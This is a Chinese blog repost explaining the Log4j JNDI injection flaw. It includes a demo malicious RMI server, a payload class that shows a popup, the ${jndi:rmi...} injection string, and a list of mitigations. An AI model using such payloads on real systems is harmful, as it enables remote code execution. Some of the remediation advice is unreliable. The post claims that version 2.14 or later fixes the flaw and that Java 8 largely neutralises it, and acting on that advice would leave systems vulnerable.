Log4j 远控JNDI漏洞: 原理?如何解决?

最新推荐文章于 2024-04-23 18:52:22 发布
最新推荐文章于 2024-04-23 18:52:22 发布
阅读量2.5k 收藏 2
点赞数 1
文章标签: java 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn_mycsdn/article/details/121888187
版权

什么是 log4j ?

log4j 是 Java 的一款优秀日志框架,目前是 Java 行业内产品的标配,几乎每个 Java 服务都使用了 log4j。简单来说就是打印和存储服务器运行时产生的报告和报错等。

哪里来的漏洞?

log4j 内提供了一些占位符替换机制,如以下代码

logger.info("os: ${java:os}");

输出的结果是 “os: Windows 10” (具体输出会更复杂,在这里简略了) 而不是 “os: ${java:os}”。也就是把 ${java:os} 替换成了 System.getProperties(“os”) 也就是 “Windows 10”。这个很好理解,但离谱的是 log4j 还提供了关于 jndi 的占位符。

logger.info("${jndi:rmi//127.0.0.1:1099/heike}")

jndi 是什么?说简单的就是几个 Java 程序互相交换信息的一种技术,因为这些 Java 程序都在同一个 JVM 虚拟机上运行。而 jndi 交换信息有很多种格式,上文代码中的 “rmi” 就是其中之一,你可以将它理解为 http 地址。总而言之,就是可以使两个 Java 程序互相搞小动作的东西。

 言归正传,当你执行上文代码时,log4j会自动加载通过 jndi 从远程服务器获取的 java 对象。远程服务器的地址即 "rmi//127.0.0.1:1099",而提供的对象则是 "heike","heike" 一般是一个Java Class。也就是说,只要你的日志里面包含 "${jndi:rmi//127.0.0.1:1099/heike}" 这一段信息,你就可能会被黑客入侵,是不是有点 sql 注入的味道了?例如我的世界也使用了 log4j,他会用 log4j 把其他玩家说的话通过 logger.info(玩家说的话) 记录下来,如果他说了一些可以触发 log4j 占位符机制且不怀好意的话,所有听到这句话的玩家都得中招,运行远程服务器上的 Java 代码。

我这么说可能有点绕了,所以各位资深 Java 玩家可以直接看具体代码。 

public class Log4jServer {
    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        LocateRegistry.createRegistry(1099);
        Registry registry = LocateRegistry.getRegistry();
        Reference reference = new Reference("me.faintcloudy.Heike", "me.faintcloudy.Heike", "http://127.0.0.1:1010/");
        ReferenceWrapper refObjWrapper = new ReferenceWrapper(reference);
        registry.bind("heike", refObjWrapper);
    }
} 

public class Heike {
  static {
    JOptionPane.showConfirmDialog(null, "你的电脑已经被我入侵了!!!");
  }
}

以上是黑客服务器上运行的代码。所以只需要你电脑上某个 Java 程序运行以下代码:

String log = "${jndi:rmi//127.0.0.1:1099/heike}";
logger.info(log);

就会出现提示“你的电脑已经被我入侵了!!!”
这仅仅是打开了一个信息框,但实际上黑客可以往 Heike.class 放任何代码,在不经意间使你的电脑报废或所有账号全被偷走。

如何解决?

先不要慌,如果你使用了 Java 8 或以上版本,基本对你没有什么危害。因为在 Java 8 中添加了一个新的属性 com.sun.jndi.rmi.object.trustURLCodebase,这是一个 boolean 类型。默认值是 false,在使用 jndi 时会抛出一个报错阻止加载远程服务器提供的代码。当然最好还是做一下防备,毕竟谁也说不准呢。

 添加 jvm 参数 -Dlog4j2.FORMATMsgNoLookups=true,他的作用是不让 log4j 替换占位符

 创建 "log4j2.component.properties" 文件,文件中加入"log4j2.formatMsgNoLookups=true"

 删除 log4j-core-*.jar 中 org/apache/logging/log4j/core/lookup/JndiLookup.class 这个文件,彻底进行不了 jndi

 更新 log4j 到最新版本 2.14 及以上

 最最最彻底: 断网

原作者 作者:FaintCloudy 地址:https://www.bilibili.com/read/cv14380391 出处:bilibili

Stefanboy
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
log4j\c3p0\jndi详细配置实例
12-16
log4j\c3p0\jndi详细配置实例
JAVA安全之Log4j-Jndi注入原理以及利用方式
shelter1234567的博客
11-08 1652
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞原理及利用方式
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j2远程代码执行漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
JNDI注入&Log4j&FastJson&白盒审计&不回显处理
qq_46081990的博客
12-19 1393
本文介绍了JNDI的概念和作用,以及LDAP和RMI两个常用的协议,Log4j / FastJson 简介及其Maven仓库配置,着重介绍了漏洞利用,以迷你天猫购物项目 Tmall 做了 Log4j / FastJson 漏洞的代码审计,最后介绍了不回显情况的处理方法。
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2464
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
qq_41696518的博客
06-13 820
环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
JNDI注入漏洞
qq_61553520的博客
05-23 1055
基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。
JNDI&RMI&LDAP介绍+log4j分析
enhengzZ的博客
02-16 1462
JNDI JNDIjava Naming and Directory Interfac即java命名与目录接口 Naming是命名服务,Director指目录服务。 通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDIJava EE的重要部分,,JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 命名服务 对资源命名方便下次调用,Naming的资源要唯一,每一个资源绑定一个名字 目录服务 顾名思义,和计算机的文件系统很像,具体来说,dns就是一
JNDI 注入漏洞的前世今生
有价值炮灰
12-14 3572
前两天的 log4j 漏洞引起了安全圈的震动,虽然是二进制选手,但为了融入大家的过年氛围,还是决定打破舒适圈来研究一下 JNDI 注入漏洞JNDI 101 首先第一个问题,什么是 JNDI,它的作用是什么? 根据官方文档,JNDI 全称为 Java Naming and Directory Interface,即 Java 名称与目录接口。虽然有点抽象,但我们至少知道它是一个接口;下一个问题是,Naming 和 Directory 是什么意思?很多相关资料都对其语焉不详,但其实官方对其有详细解释。 N
log4j-2.15.0-rc2.zip
12-11
修复log4j关于JNDI注入漏洞注入的jar升级包,内附漏洞验证方式
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
log4j_2.1.5.zip
12-14
logj JNDI 补丁包
mybatisPlus使用MetaObjectHandler对字段进行更新
最新发布
m0_56356631的博客
04-23 312
都是符合我们的预期的。
string模拟实现
m0_73969414的博客
04-23 1426
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 582
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
javaweb-SpringBoot基础
kussm_的博客
04-20 1323
Spring的官网(Spring的简介:Spring makes Java simple。Spring Boot 可以帮助我们非常快速的构建应用程序、简化开发、提高效率。创建一个子包controller。
第5 章 Consul服务注册与发现
a13763926743的博客
04-22 753
consul官网地址。
log4j反序列化漏洞原理
07-28
漏洞原理是通过利用Log4jJNDIJava Naming and Directory Interface)功能,攻击者可以通过构造恶意的序列化数据来执行远程命令。 具体来说,Log4j库在处理日志消息时,会调用JNDI资源进行日志记录。而在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值